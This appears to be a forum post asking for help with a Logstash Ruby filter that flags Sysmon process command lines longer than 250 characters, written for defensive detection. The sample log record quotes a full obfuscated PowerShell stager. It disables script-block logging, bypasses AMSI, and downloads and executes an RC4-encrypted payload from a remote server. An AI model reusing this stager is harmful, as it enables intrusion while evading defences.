hi
im trying to port the answer given here
```
filter {
ruby {
code => "
event['indexname'] = event['somefield'].length > 10 ? 'long-fields' : 'short-fields'
"
}
}
```
and here
ruby {
code => "event['contentLength'] = event['contents'].length"
}
my use context is sysmon data containing command line execution. I want to count the number of characters in this field "process_command_line" and add a new field containing the character count of the "process_command_line" field. IF there are more than X amount of characters below the example is 250.
based on above i have thought up the following logstash filter (that does not work ;( )
filter {
if [log_name] == "Microsoft-Windows-Sysmon/Operational"{
ruby {
code =>"
event['processcreate'] = event['process_command_line'].length > 250
}
mutate {
add_field => { "IOC" => "Commandline exceeds 250 characters" }
add_tag => { "Commandline exceeds 250 characters" }
}
}
}
below is the json version of the data im trying to parse
"_index": "logs-endpoint-winevent-sysmon-2018.11.12",
"_type": "doc",
"_id": "1236578089",
"_version": 1,
"_score": null,
"_source": {
"user_domain": "blabla",
"process_command_line": "C:\\WINdows\\SYSTeM32\\cMD /c\"SET glex= seT-varIABle (\"{1}{0}\"-f 'O','dvMnp') ( [TYPe](\"{2}{1}{0}\"-F 'ock','Bl','SCRIpt') ) ; SET-itEm (\"vARI\"+\"abLe:b\"+\"URQ\") ( [tyPe](\"{1}{0}\" -F 'f','RE') ) ; seT ('hd'+'AP') ( [TyPe](\"{1}{3}{5}{4}{2}{0}\"-f 'ER','SY','tmaNag','stEM.net.SerV','oin','IcEp') ) ; SV (\"{1}{0}\"-f'goz','w') ( [type](\"{0}{3}{1}{2}\" -F 'S','U','eST','ysTeM.NeT.WEbREQ') ) ;$QhL =[tyPe](\"{1}{0}{2}{4}{3}\" -f'red','SYStem.net.c','ENtiaLC','hE','ac'); SEt-item (\"{3}{1}{2}{0}\" -f'F','AriAb','le:xY','V') ( [tYPe](\"{2}{1}{0}{4}{3}\"-F 'E','EM.TEXT.','SYST','COdING','n')) ; If(${P`Sv`ersiOnT`AbLE}.\"ps`VerS`ion\".\"M`AjOR\" -gE 3){${g`Ps}= (gEt-ChIlDITEm (\"v\"+\"aRiABL\"+\"e:b\"+\"Urq\") ).\"VaL`Ue\".\"A`SsE`MbLy\".(\"{0}{1}\" -f 'GetT','ype').Invoke((\"{2}{3}{0}{4}{5}{1}{6}\" -f 'gement.','atio','System.Man','a','Aut','om','n.Utils')).\"GETFie`lD\"((\"{1}{3}{0}{4}{2}\"-f'tti','cachedGroupPoli','gs','cySe','n'),'N'+(\"{0}{1}{2}\" -f 'on','Public,Stati','c')).(\"{1}{0}\"-f'VALue','GEt').Invoke(${n`UlL});If(${G`PS}[(\"{2}{1}{0}\" -f 'iptB','r','Sc')+(\"{0}{1}{2}\" -f 'lockL','oggi','ng')]){${G`ps}[(\"{0}{1}\"-f'Scr','iptB')+(\"{2}{0}{1}\" -f'ggin','g','lockLo')][(\"{3}{1}{0}{2}\" -f'crip','S','tB','Enable')+(\"{2}{3}{1}{0}\" -f'ing','gg','lo','ckLo')]=0;${g`Ps}[(\"{2}{0}{1}\" -f 'ip','tB','Scr')+(\"{2}{1}{0}{3}\" -f'in','ckLogg','lo','g')][(\"{5}{6}{0}{7}{8}{3}{4}{2}{1}\"-f'r','g','n','ionLo','ggi','En','ableSc','iptBlockInv','ocat')]=0}ELse{ ( GEt-VARiAbLE (\"{1}{2}{0}\"-f'O','D','vMNp') -vALUEo ).\"GETFiE`lD\"((\"{1}{2}{0}\"-f 'es','signatu','r'),'N'+(\"{0}{1}{2}\" -f 'onP','ublic,','Static')).(\"{0}{1}\"-f'SEtVAl','Ue').Invoke(${N`Ull},(.(\"{0}{1}{2}\" -f 'N','Ew-OBjeC','t') (\"{0}{9}{2}{7}{10}{8}{1}{5}{4}{6}{3}\"-f'C','h','Ct','TriNg]','t','Se','[S','iOns','Generic.Has','olle','.')))} (VaRiaBLE ('BU'+'Rq') -vaL ).\"a`s`SembLY\".(\"{2}{1}{0}\" -f 'E','TYP','Get').Invoke((\"{7}{6}{1}{4}{2}{5}{0}{3}\"-f 'ation.Am','em.Ma','e','siUtils','nag','ment.Autom','yst','S'))^|^&('?'){${_}}^|.('HdAp\") ).\"v`ALUe\"::\"ExPEcT100cont`I`N`Ue\"=0;${wc}=.(\"{0}{2}{1}\"-f 'NEw','JecT','-Ob') (\"{0}{4}{3}{1}{2}{5}\" -f'SY','M.','NEt.WebClI','te','s','enT');${U}=(\"{6}{11}{5}{4}{10}{9}{8}{12}{0}{15}{1}{7}{3}{16}{2}{13}{14}\"-f 'ri','7.0; ','i','0','.0 (Windo','lla/5','M','rv:11.','W','T 6.1; ','ws N','ozi','OW64; T','ke',' Gecko','dent/',') l'); $hdAP::\"s`eRVeRc`ERTiFic`ATEVAliD`A`TI`oN`c`AlLBacK\" = {${T`RUE}};${wC}.\"head`eRS\".(\"{1}{0}\" -f 'DD','A').Invoke((\"{2}{0}{1}\" -f 'r-Ag','ent','Use'),${U});${WC}.\"pR`oxY\"= $WgOz::\"DEF`A`UlTWebp`R`oXY\";${Wc}.\"p`RoxY\".\"cRE`D`EntiALs\" = ( varIaBle ('q'+'hl') ).\"vAL`UE\"::\"D`efAulTnEt`W`o`RKCRE`dENt`IALs\";${SCrIpT`:Pr`oxY} = ${wc}.\"pro`xy\";${k}= ( VaRiABLE (\"{1}{0}\"-f 'F','Xy') ).\"vaL`UE\"::\"as`cii\".(\"{2}{0}{1}\" -f'y','teS','GETB').Invoke((\"{1}{9}{2}{8}{7}{0}{4}{5}{3}{6}\" -f '5','71a50','e00f','191','fb9','3ed','65','7','68511af7a','6'));${R}={${d},${K}=${ar`Gs};${s}=0..255;0..255|.('${K}.\"co`UNT\"])56;${s}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]};${D}|&('256;${H}=(${h}+${s}[${I}])56;${s}[${I}],${S}[${H}]=${S}[${H}],${s}[${i}];${_}-bxOR${s}[(${S}[${i}]+${S}[${h}])56]}};${S`ER}=(\"{1}{5}{6}{0}{4}{3}{2}\"-f '://192.168.1','ht','4','9:44','49.12','tp','s');${t}=(\"{5}{3}{2}{4}{1}{0}\"-f'p','ph','s','n/proces','.','/logi');${Wc}.\"HEa`D`ERS\".(\"{0}{1}\"-f'A','dd').Invoke((\"{0}{1}\" -f'Cook','ie'),(\"{7}{3}{0}{4}{1}{2}{10}{6}{9}{8}{5}\" -f'on=4tr4','QTx','y','i','0APvZ','=','0Rr','sess','03M','aet','3Yu92'));${dA`TA}=${w`C}.(\"{2}{0}{3}{1}\" -f 'd','AtA','DOwnLOA','D').Invoke(${s`er}+${T});${iv}=${d`ATA}[0..3];${da`TA}=${d`Ata}[4..${d`ATA}.\"le`NgtH\"];-joiN[CHAr[]](& ${R} ${dA`Ta} (${iv}+${K}))|.(\"{0}{1}\" -f'IE','X') ",
"version": 5,
"source_name": "Microsoft-Windows-Sysmon",
"process_parent_path": "C:\\Windows\\System32\\cmd.exe",
"file_product": "Microsoft® Windows® Operating System",
"@timestamp": "2018-11-12T14:02:05.047Z",
"user_logon_guid": "25C0BD5F-87DC-5BE9-0000-0020A96DD505",
"LogonId": "0x5d56da9",
"task": "Process Create (rule: ProcessCreate)",
"file_description": "Windows Command Processor",
"user_reporter_type": "Well Known Group",